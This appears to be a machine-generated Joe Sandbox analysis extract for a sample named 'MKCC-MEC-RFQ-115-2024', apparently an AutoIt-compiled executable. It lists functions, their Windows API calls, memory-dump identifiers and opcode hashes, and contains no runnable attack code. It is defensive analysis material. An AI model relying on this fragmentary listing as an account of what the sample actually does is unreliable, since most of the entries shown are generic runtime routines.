                                              • Instruction ID: cd57ff65f53336a806dceb6446d43e4f61cf367f5c2483a0607b1c7a0ad74f3a
                                              • Opcode Fuzzy Hash: ac7859b9e6248c5cbe683b105db3a923a2d4cb4c4e11840dd6b066d050c01365
                                              • Instruction Fuzzy Hash: D3F05EB25443007FE2102771AC05FBB3A5CEB0A354F000020FA18E56D2E7B14B5087A8
                                              Function 00146E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?), ref: 00146E88
                                                • Part of subcall function 0014794E: _memset.LIBCMT ref: 00147983
                                              • _memmove.LIBCMT ref: 00146EAB
                                              • _memset.LIBCMT ref: 00146EB8
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00146EC8
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                              • String ID:
                                              • API String ID: 48991266-0
                                              • Opcode ID: 5ef2b3382944367176998e1e597c1aa1052b9aa20ff6be75585c9c5ebdf097f6
                                              • Instruction ID: 9a2c77c7c8ae34175fac89b91f4e8ce047b428a7a6ab3ea5eeefc548659f843f
                                              • Opcode Fuzzy Hash: 5ef2b3382944367176998e1e597c1aa1052b9aa20ff6be75585c9c5ebdf097f6
                                              • Instruction Fuzzy Hash: 66F05E3A204210BBCF016F55EC85A8ABB2AEF55320B048065FE085E26AC771E951CBB4
                                              Function 0016C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 000E134D
                                                • Part of subcall function 000E12F3: SelectObject.GDI32(?,00000000), ref: 000E135C
                                                • Part of subcall function 000E12F3: BeginPath.GDI32(?), ref: 000E1373
                                                • Part of subcall function 000E12F3: SelectObject.GDI32(?,00000000), ref: 000E139C
                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0016C030
                                              • LineTo.GDI32(00000000,?,?), ref: 0016C03D
                                              • EndPath.GDI32(00000000), ref: 0016C04D
                                              • StrokePath.GDI32(00000000), ref: 0016C05B
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                              • String ID:
                                              • API String ID: 1539411459-0
                                              • Opcode ID: 1b68bae0fbf6a4be1d7891a4835421b417cea6fc21b3379cc1928e87f92bb6e2
                                              • Instruction ID: 0e36b5a12db1598434d439fab2364873dee43dfcaeacf09649ba3ec1fff6ccdf
                                              • Opcode Fuzzy Hash: 1b68bae0fbf6a4be1d7891a4835421b417cea6fc21b3379cc1928e87f92bb6e2
                                              • Instruction Fuzzy Hash: 31F08236105259FBDB126F55BC0DFDE3F59AF06311F144004FA11614E287B959A2CFE5
                                              Function 0013A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0013A399
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0013A3AC
                                              • GetCurrentThreadId.KERNEL32 ref: 0013A3B3
                                              • AttachThreadInput.USER32(00000000), ref: 0013A3BA
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                              • String ID:
                                              • API String ID: 2710830443-0
                                              • Opcode ID: c0b642a79b9587d49d0864dd6b0fadbcd82decea2d6f403460c5cd9262ee0265
                                              • Instruction ID: 7121918e5a1729a910bbb031f1424cb068b6c02f787ba99764ae12161d1203c2
                                              • Opcode Fuzzy Hash: c0b642a79b9587d49d0864dd6b0fadbcd82decea2d6f403460c5cd9262ee0265
                                              • Instruction Fuzzy Hash: 7CE0C931545228BAEB205BA2EC0DEE77F5CFF167A1F408029F54995460C7B18581DBA1
                                              Function 000E2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 000E2231
                                              • SetTextColor.GDI32(?,000000FF), ref: 000E223B
                                              • SetBkMode.GDI32(?,00000001), ref: 000E2250
                                              • GetStockObject.GDI32(00000005), ref: 000E2258
                                              • GetWindowDC.USER32(?,00000000), ref: 0011C0D3
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0011C0E0
                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0011C0F9
                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0011C112
                                              • GetPixel.GDI32(00000000,?,?), ref: 0011C132
                                              • ReleaseDC.USER32(?,00000000), ref: 0011C13D
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                              • String ID:
                                              • API String ID: 1946975507-0
                                              • Opcode ID: 9cf6a1021a0d6839a5466a2fb190922a6ab7d9d17cffb44c6917836a060d5d72
                                              • Instruction ID: ef149afab63f23e206823c291d763b2d29bd2ec96acbcd9b0bf3bb63d5172e7c
                                              • Opcode Fuzzy Hash: 9cf6a1021a0d6839a5466a2fb190922a6ab7d9d17cffb44c6917836a060d5d72
                                              • Instruction Fuzzy Hash: 4AE03932544244EADB255FA4FC097D83B14EB16336F04837AFA69980E187B149C1DB52
                                              Function 00138C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 00138C63
                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,0013882E), ref: 00138C6A
                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0013882E), ref: 00138C77
                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,0013882E), ref: 00138C7E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CurrentOpenProcessThreadToken
                                              • String ID:
                                              • API String ID: 3974789173-0
                                              • Opcode ID: 6b621a0ae09bb963aedbff821a2bf51972621053149f505b6995f865d59d8f2a
                                              • Instruction ID: 4c9deea5754b46a5c6930854c57963624980d7270bdc445fad76d3c72828a74d
                                              • Opcode Fuzzy Hash: 6b621a0ae09bb963aedbff821a2bf51972621053149f505b6995f865d59d8f2a
                                              • Instruction Fuzzy Hash: 30E04F36656311ABD7205FB07D0CB973BA8EF507A2F14482CF245C9040DA748482CB61
                                              Function 00122187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00122187
                                              • GetDC.USER32(00000000), ref: 00122191
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001221B1
                                              • ReleaseDC.USER32(?), ref: 001221D2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: ea6cb3d7ae3c4b282465d95a399aae7bc8a4b5a800b5d025c6782427672b54b4
                                              • Instruction ID: 3e5360be0a5cfb9175640559e2d005d5b12348e3212567aed482fe742ffecbb9
                                              • Opcode Fuzzy Hash: ea6cb3d7ae3c4b282465d95a399aae7bc8a4b5a800b5d025c6782427672b54b4
                                              • Instruction Fuzzy Hash: 1CE0E5B5800214EFDB019F61EC08A9D7BF2FB4C351F11C429F95AA7660CBB881829F40
                                              Function 0012219B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 0012219B
                                              • GetDC.USER32(00000000), ref: 001221A5
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 001221B1
                                              • ReleaseDC.USER32(?), ref: 001221D2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: af931baa326e087373fb6474ab00fd44df0d169941339ef7b7465e768edee32c
                                              • Instruction ID: 97bef13ba40f1528600405a2960cc2e5d681119a7f6a5ae8b12204a846978d3b
                                              • Opcode Fuzzy Hash: af931baa326e087373fb6474ab00fd44df0d169941339ef7b7465e768edee32c
                                              • Instruction Fuzzy Hash: 74E012B9800204AFCB119FB1EC08A9D7BF2FF4C351F10C029F95AA7660CBB891829F40
                                              Function 0013B7B6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OleSetContainedObject.OLE32(?,00000001), ref: 0013B981
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ContainedObject
                                              • String ID: AutoIt3GUI$Container
                                              • API String ID: 3565006973-3941886329
                                              • Opcode ID: 29bb9210053416bbf3e7db38ef64e0749bd7bbcfdd57170e0788a3b7ee64f900
                                              • Instruction ID: a7c9a52aedefe979cb923ed448b9b38e4c5f7f02ce3002a7b75d5163e345b9fa
                                              • Opcode Fuzzy Hash: 29bb9210053416bbf3e7db38ef64e0749bd7bbcfdd57170e0788a3b7ee64f900
                                              • Instruction Fuzzy Hash: 77914A706046019FDB24DF68C884B6ABBF9FF48710F14856DFA4ADB691EB70E841CB50
                                              Function 0014B217 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000FFEC6: _wcscpy.LIBCMT ref: 000FFEE9
                                                • Part of subcall function 000E9997: __itow.LIBCMT ref: 000E99C2
                                                • Part of subcall function 000E9997: __swprintf.LIBCMT ref: 000E9A0C
                                              • __wcsnicmp.LIBCMT ref: 0014B298
                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0014B361
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                              • String ID: LPT
                                              • API String ID: 3222508074-1350329615
                                              • Opcode ID: e7123e1a48c9c1945655c90c09e9c83d29195b12c29f9222b4c90f61c3defcd0
                                              • Instruction ID: ce9794b440242213c47e24dd67677b0ad40f5e7ba1f3aad4e881f69981c5b1b4
                                              • Opcode Fuzzy Hash: e7123e1a48c9c1945655c90c09e9c83d29195b12c29f9222b4c90f61c3defcd0
                                              • Instruction Fuzzy Hash: 5E617175A04215EFCB18DF99C881EEEB7B4BF48310F15406AF946AB2A1DB70EE41CB50
                                              Function 000F2AB7 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNEL32(00000000), ref: 000F2AC8
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 000F2AE1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: GlobalMemorySleepStatus
                                              • String ID: @
                                              • API String ID: 2783356886-2766056989
                                              • Opcode ID: 48d74ae2673cc7b8bd67350fb02e34001f733ef9465097e92dda978f07ec6ee8
                                              • Instruction ID: fb9e5733ea2d5eb08d9e767df904b9cc11bea6316069f0cac75532dd04ac67e5
                                              • Opcode Fuzzy Hash: 48d74ae2673cc7b8bd67350fb02e34001f733ef9465097e92dda978f07ec6ee8
                                              • Instruction Fuzzy Hash: 19514AB14187859FD320AF11DC85BAFB7E8FF84310F82485DF2E9511A2DB318969CB56
                                              Function 001499BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000E506B: __fread_nolock.LIBCMT ref: 000E5089
                                              • _wcscmp.LIBCMT ref: 00149AAE
                                              • _wcscmp.LIBCMT ref: 00149AC1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _wcscmp$__fread_nolock
                                              • String ID: FILE
                                              • API String ID: 4029003684-3121273764
                                              • Opcode ID: 6d2cdda8a3976d76fc695fff5e7181d5d42f0e8bc5ff36c3ce71bdc3b8cab9cc
                                              • Instruction ID: 8929ddde6f35c3a1a69d18d1241715f77e900c7f8601013826ccb5a087cdf403
                                              • Opcode Fuzzy Hash: 6d2cdda8a3976d76fc695fff5e7181d5d42f0e8bc5ff36c3ce71bdc3b8cab9cc
                                              • Instruction Fuzzy Hash: 8041D4B1A00619BEDF209FA5DC46FEFBBBDEF45714F000469B900B7191DBB5AA0487A1
                                              Function 00152882 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00152892
                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001528C8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CrackInternet_memset
                                              • String ID: |
                                              • API String ID: 1413715105-2343686810
                                              • Opcode ID: ca9ac17d17e8149e8fcc92a0b2c8ce83f4b85dcc988b128a46125fb5af2b2bd0
                                              • Instruction ID: fe5f0c6c2e6952e05b300bddd2832b0424d97a6fd0270b7d26875c66681f5c30
                                              • Opcode Fuzzy Hash: ca9ac17d17e8149e8fcc92a0b2c8ce83f4b85dcc988b128a46125fb5af2b2bd0
                                              • Instruction Fuzzy Hash: 34311A71800119EFCF059FA1CC85EEEBFB9FF19300F14406AF815A6266DB315A56DBA0
                                              Function 00166CD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                              Download Yara Rule
                                              APIs
                                              • DestroyWindow.USER32(?,?,?,?), ref: 00166D86
                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00166DC2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$DestroyMove
                                              • String ID: static
                                              • API String ID: 2139405536-2160076837
                                              • Opcode ID: e633056fb3aeec6a45d5fa1fc9b49946cd8a0a232acbade110fd75b412445ce5
                                              • Instruction ID: e5c085bd8086e946a01f001e3bd65b27ea243efc6aaf2c547f631c3d40ce975b
                                              • Opcode Fuzzy Hash: e633056fb3aeec6a45d5fa1fc9b49946cd8a0a232acbade110fd75b412445ce5
                                              • Instruction Fuzzy Hash: 7C318F71210604AEDB109F64DC80AFB77B9FF48724F10961DF9A9D7191DB71ACA1CB60
                                              Function 00142D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00142E00
                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00142E3B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: InfoItemMenu_memset
                                              • String ID: 0
                                              • API String ID: 2223754486-4108050209
                                              • Opcode ID: 6b7f169bcdfa6636e26ebe2c8a2e4897a2729b59fe3eca41ffd030e5c8be1c61
                                              • Instruction ID: f3eb4ba8c20292a7e7740eaf503379cb3999614a3b6bbc07437d71a285890854
                                              • Opcode Fuzzy Hash: 6b7f169bcdfa6636e26ebe2c8a2e4897a2729b59fe3eca41ffd030e5c8be1c61
                                              • Instruction Fuzzy Hash: F631C131A00309ABEB248F58D885BAEBBB9EF05350F54046AF985E71B0E7B099C4CB50
                                              Function 0013AFDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 000F619A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 000F61B1
                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0013B03B
                                              • _strlen.LIBCMT ref: 0013B046
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: MessageSend$Timeout_strlen
                                              • String ID: @U=u
                                              • API String ID: 2777139624-2594219639
                                              • Opcode ID: 300501f3c34bc67189714a7176891de52c53fdfdf55298683e7e98cdf07053f3
                                              • Instruction ID: 599624334b39fbedb20bd9f6d322ebe40a354b6be3a80f17f0ee3398eae8aa80
                                              • Opcode Fuzzy Hash: 300501f3c34bc67189714a7176891de52c53fdfdf55298683e7e98cdf07053f3
                                              • Instruction Fuzzy Hash: 6211E4322082056ACB1CAA79DCD2AFF7BB99F59300F10003EF719DA1A3EF6599459360
                                              Function 00166AD4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 76windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0014589F: GetLocalTime.KERNEL32 ref: 001458AC
                                                • Part of subcall function 0014589F: _wcsncpy.LIBCMT ref: 001458E1
                                                • Part of subcall function 0014589F: _wcsncpy.LIBCMT ref: 00145913
                                                • Part of subcall function 0014589F: _wcsncpy.LIBCMT ref: 00145946
                                                • Part of subcall function 0014589F: _wcsncpy.LIBCMT ref: 00145988
                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00166B6E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _wcsncpy$LocalMessageSendTime
                                              • String ID: @U=u$SysDateTimePick32
                                              • API String ID: 2466184910-2530228043
